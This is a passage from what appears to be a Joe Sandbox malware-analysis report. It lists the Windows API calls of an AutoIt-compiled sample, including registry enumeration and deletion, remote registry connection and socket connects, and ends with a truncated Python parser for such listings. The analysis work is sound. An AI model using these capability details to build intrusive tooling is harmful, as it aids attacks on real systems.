                                                  • Opcode Fuzzy Hash: 0f543dd78adaa2e7e483ecae9723a6a2105c0360dbe71750e1f5aa065b6a55ac
                                                  • Instruction Fuzzy Hash: 85418F71108394AEC756EF64D841ADF77ECAF89380F10086EB49AC3651EB38D789C752
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C472AA
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C47351
                                                  • IsMenu.USER32(?), ref: 00C47369
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C473B1
                                                  • DrawMenuBar.USER32 ref: 00C473C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: b6f949fa7099d8b19168e45c8257f54e632d06e679c5eb915a4d64f8547eb9c1
                                                  • Instruction ID: 1d4d12a463c9f849b74c80295db6e037c7acfd3c77b33d5e46fe7b6810754ca4
                                                  • Opcode Fuzzy Hash: b6f949fa7099d8b19168e45c8257f54e632d06e679c5eb915a4d64f8547eb9c1
                                                  • Instruction Fuzzy Hash: F3411575A44208EFDB20DF60D884A9EBBF8FB09310F148629FD15A7260D770AE50DF60
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C40FD4
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C40FFE
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00C410B5
                                                    • Part of subcall function 00C40FA5: RegCloseKey.ADVAPI32(?), ref: 00C4101B
                                                    • Part of subcall function 00C40FA5: FreeLibrary.KERNEL32(?), ref: 00C4106D
                                                    • Part of subcall function 00C40FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C41090
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00C41058
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 691bce689529e4b8a2c80668488d80d475a5988b9faed23614555b4b47d99335
                                                  • Instruction ID: abc19d19436ded8b07f44595e4a11c2338fb1c87adbf91196f9afc16f49c96ee
                                                  • Opcode Fuzzy Hash: 691bce689529e4b8a2c80668488d80d475a5988b9faed23614555b4b47d99335
                                                  • Instruction Fuzzy Hash: C7313E75900109BFEB149F90DC89EFFB7BCFF09340F04016AE952A2141D7705F899AA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C462EC
                                                  • GetWindowLongW.USER32(00EE54C8,000000F0), ref: 00C4631F
                                                  • GetWindowLongW.USER32(00EE54C8,000000F0), ref: 00C46354
                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C46386
                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C463B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C463C1
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C463DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 7a7a4842fa48c687fd024ec1a0d497c3eac2d6464d29ef9a7e7cbeff33694a9b
                                                  • Instruction ID: 5f8782dcd2819c60813674b2166da3c0e92ff3a878cc5703f377087c9d8fa50b
                                                  • Opcode Fuzzy Hash: 7a7a4842fa48c687fd024ec1a0d497c3eac2d6464d29ef9a7e7cbeff33694a9b
                                                  • Instruction Fuzzy Hash: 03311338640290AFDB21CF19DC84F5837E1FB4A724F1901A9F5218F2B6CB71AD40DB52
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DB2E
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DB54
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C1DB57
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DB75
                                                  • SysFreeString.OLEAUT32(?), ref: 00C1DB7E
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1DBA3
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DBB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: cd751c72e8c671ecc780c85cb1afae6edbdc01905aac0cb6151ed3916759f292
                                                  • Instruction ID: 21c495fb4c6bf317a1fa016aca12d6d785c019e65e2b07d103a23e361c46fbd2
                                                  • Opcode Fuzzy Hash: cd751c72e8c671ecc780c85cb1afae6edbdc01905aac0cb6151ed3916759f292
                                                  • Instruction Fuzzy Hash: 4221A376604219AF9F10DFA9DC88DFF73ECFB0A360B018169F916DB250DA709D819B60
                                                  APIs
                                                    • Part of subcall function 00C37D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C37DB6
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C361C6
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C361D5
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C3620E
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00C36217
                                                  • WSAGetLastError.WSOCK32 ref: 00C36221
                                                  • closesocket.WSOCK32(00000000), ref: 00C3624A
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C36263
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: 6d94b7bd47b0025dd3cba07d6615b909b7da7dc993cbf3010c6599da949dc2a8
                                                  • Instruction ID: da790a27d0ca8232e138b0f0be2ef1872b6794a9a45a17687a74556ad5372fcc
                                                  • Opcode Fuzzy Hash: 6d94b7bd47b0025dd3cba07d6615b909b7da7dc993cbf3010c6599da949dc2a8
                                                  • Instruction Fuzzy Hash: D531C175610108AFEF10AF24CC89FBE7BA8EB46750F05806DF915AB291CB70AD059BA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                  • API String ID: 1038674560-2734436370
                                                  • Opcode ID: 2a7b7d9246ce1cb7bacab3ce1e7022b0ef3a2d4685c61de813d0bf022852b772
                                                  • Instruction ID: 6863c9dc5039ec0f2cb253a189184d9d2f82f71aa5d36010d8cd03145345a64a
                                                  • Opcode Fuzzy Hash: 2a7b7d9246ce1cb7bacab3ce1e7022b0ef3a2d4685c61de813d0bf022852b772
                                                  • Instruction Fuzzy Hash: 582134B220465166D220AA35AC02EEB73E8EF5B740F24403DF85687191EB909ED3E2D5
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DC09
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C1DC2F
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C1DC32
                                                  • SysAllocString.OLEAUT32 ref: 00C1DC53
                                                  • SysFreeString.OLEAUT32 ref: 00C1DC5C
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00C1DC76
                                                  • SysAllocString.OLEAUT32(?), ref: 00C1DC84
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 755ffcab590c515133850c5e918d6cce1493fdaf94c49adc3b68f0f35184d6d6
                                                  • Instruction ID: a09003d00d395340cbf7fb33741106626ba1d1fc946d270bd2b20fbc3fb97739
                                                  • Opcode Fuzzy Hash: 755ffcab590c515133850c5e918d6cce1493fdaf94c49adc3b68f0f35184d6d6
                                                  • Instruction Fuzzy Hash: 37217735604105AF9B10DFA9DC88EEB77ECFB0A360B108525F915CB260DAB0DD81DBA4
                                                  APIs
                                                    • Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
                                                    • Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
                                                    • Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C47632
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C4763F
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C4764A
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C47659
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C47665
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: 16c276e7ef439a8fd2fa7b6c4653f9830aa1d953f962faccec4c94930efe9e55
                                                  • Instruction ID: b26e364f9705f5243d6384d0da3a7e8f32ff12a2cc6495a955c32dc053f21f77
                                                  • Opcode Fuzzy Hash: 16c276e7ef439a8fd2fa7b6c4653f9830aa1d953f962faccec4c94930efe9e55
                                                  • Instruction Fuzzy Hash: 1E11B6B1510119BFEF118F64CC85EEB7F6DFF08798F014114B604A2060CB729C21DBA4
                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 00BE9AE6
                                                    • Part of subcall function 00BE3187: EncodePointer.KERNEL32(00000000), ref: 00BE318A
                                                    • Part of subcall function 00BE3187: __initp_misc_winsig.LIBCMT ref: 00BE31A5
                                                    • Part of subcall function 00BE3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BE9EA0
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BE9EB4
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BE9EC7
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BE9EDA
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BE9EED
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BE9F00
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BE9F13
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BE9F26
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BE9F39
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BE9F4C
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BE9F5F
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BE9F72
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BE9F85
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BE9F98
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BE9FAB
                                                    • Part of subcall function 00BE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BE9FBE
                                                  • __mtinitlocks.LIBCMT ref: 00BE9AEB
                                                  • __mtterm.LIBCMT ref: 00BE9AF4
                                                    • Part of subcall function 00BE9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BE9AF9,00BE7CD0,00C7A0B8,00000014), ref: 00BE9C56
                                                    • Part of subcall function 00BE9B5C: _free.LIBCMT ref: 00BE9C5D
                                                    • Part of subcall function 00BE9B5C: DeleteCriticalSection.KERNEL32(00C7EC00,?,?,00BE9AF9,00BE7CD0,00C7A0B8,00000014), ref: 00BE9C7F
                                                  • __calloc_crt.LIBCMT ref: 00BE9B19
                                                  • __initptd.LIBCMT ref: 00BE9B3B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BE9B42
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 3567560977-0
                                                  • Opcode ID: f094141f3987de57b84a0a0cf656a733e0d76b0ceadbf5a52d510ea75c1fdc4a
                                                  • Instruction ID: 809135381a06870deef06aa9eed417062b67c1eb5aecaaaf123d174f7f7e90fd
                                                  • Opcode Fuzzy Hash: f094141f3987de57b84a0a0cf656a733e0d76b0ceadbf5a52d510ea75c1fdc4a
                                                  • Instruction Fuzzy Hash: 98F090325197A16AE774B777BC0778E26D1DF02734F204AFDF664D61E2EF20884941A0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00BE3F85), ref: 00BE4085
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00BE408C
                                                  • EncodePointer.KERNEL32(00000000), ref: 00BE4097
                                                  • DecodePointer.KERNEL32(00BE3F85), ref: 00BE40B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 77afe1b567682156ae9882231ace6b53897a4ebdfd108611d5ff5f89f602f335
                                                  • Instruction ID: c5db6b8c54b99a028b69affeb3067515913582109ceff952ee1e086bbf11a3c1
                                                  • Opcode Fuzzy Hash: 77afe1b567682156ae9882231ace6b53897a4ebdfd108611d5ff5f89f602f335
                                                  • Instruction Fuzzy Hash: 4EE09278981240ABEA20AF61EC0DB0D3AE5B706F42F105038F501E10E0CBB64645DB18
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00BC1DDC
                                                  • GetWindowRect.USER32(?,?), ref: 00BC1E1D
                                                  • ScreenToClient.USER32(?,?), ref: 00BC1E45
                                                  • GetClientRect.USER32(?,?), ref: 00BC1F74
                                                  • GetWindowRect.USER32(?,?), ref: 00BC1F8D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Rect$Client$Window$Screen
                                                  • String ID:
                                                  • API String ID: 1296646539-0
                                                  • Opcode ID: a24e8cfc42627ced51a5f56f9118ceee383abe9a57486be82223382efa7eaa50
                                                  • Instruction ID: a98882caf0a6754c5479ac32ceb96be3b6caa097a41fcc1688172e97fbf9a41d
                                                  • Opcode Fuzzy Hash: a24e8cfc42627ced51a5f56f9118ceee383abe9a57486be82223382efa7eaa50
                                                  • Instruction Fuzzy Hash: 84B1497990024ADBDB10CFA8C480BEEB7F1FF09310F1495A9ED59EB256DB30A940CB64
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                  • Instruction ID: 92f600aa7c86ab0c4c8ae73a91290a2df817fe0ef2e8b7d283c734431daf2f01
                                                  • Opcode Fuzzy Hash: 24132d38f82a37ab7f3bdb1bcae677fd77bf2f02b632f77fef73ae5b321cb7ec
                                                  • Instruction Fuzzy Hash: B3619B309002AAABDF01EF61DC86FFE37A5AF05308F0445A8F8555B292DB74ED45DB60
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C402BD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C402FD
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C40320
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C40349
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C4038C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C40399
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 01ae99bc040bdcc600e7cd4eefffe585395fe03d5f6ce21400b1b346d657ace1
                                                  • Instruction ID: 6a4cf31aa89b8a0d5a57fdd1128388e18af1d5ce0df1492a24b55170ce0e5227
                                                  • Opcode Fuzzy Hash: 01ae99bc040bdcc600e7cd4eefffe585395fe03d5f6ce21400b1b346d657ace1
                                                  • Instruction Fuzzy Hash: CE517A31208200AFC710EF64C885E6FBBE9FF89314F14496DF9958B2A2DB71E945DB52
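Two of the records above are worth reading as a sequence rather than as isolated calls: the `Msctls_Progress32` record sends `0x2001`, `0x409`, `0x402`, `0x401` and `0x404` to a freshly created progress control (PBM_SETBKCOLOR, PBM_SETBARCOLOR, PBM_SETPOS, PBM_SETRANGE with MAKELPARAM(0, 100) and PBM_SETSTEP, i.e. the AutoIt progress-control setup), and the record just above chains `RegConnectRegistryW`, `RegOpenKeyExW` and `RegEnumValueW` (index `-1` means the caller supplies the index at run time), which is registry enumeration that can also target a remote machine. The parser below is an added example, not part of the report and not Joe Sandbox tooling: it turns the report's `API.MODULE(args), ref: ADDR` lines into records, names the window messages it knows, and tags rough capabilities. The sample lines are copied from the records on this page, the message and constant values are standard Win32 values, and the capability tags are this example's own grouping.

```python
"""Parse Joe Sandbox 'APIs' lines into structured calls and summarise them (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Matches both plain lines and "Part of subcall function XXXX:" lines, with or
# without an argument list, e.g.
#   • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C47632
#   • SysAllocString.OLEAUT32 ref: 00C1DC53
LINE_RX = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[object]          # int for immediates, None for "?", str for literals
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # function address when listed as a subcall


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None             # value not recoverable statically
    try:
        return int(tok, 16)     # report prints immediates as signed 8-hex-digit words
    except ValueError:
        return tok              # string literal such as an export or DLL name


def parse_api_lines(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RX.search(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


WM_USER = 0x400
MSG_NAMES = {
    0x0030: "WM_SETFONT",
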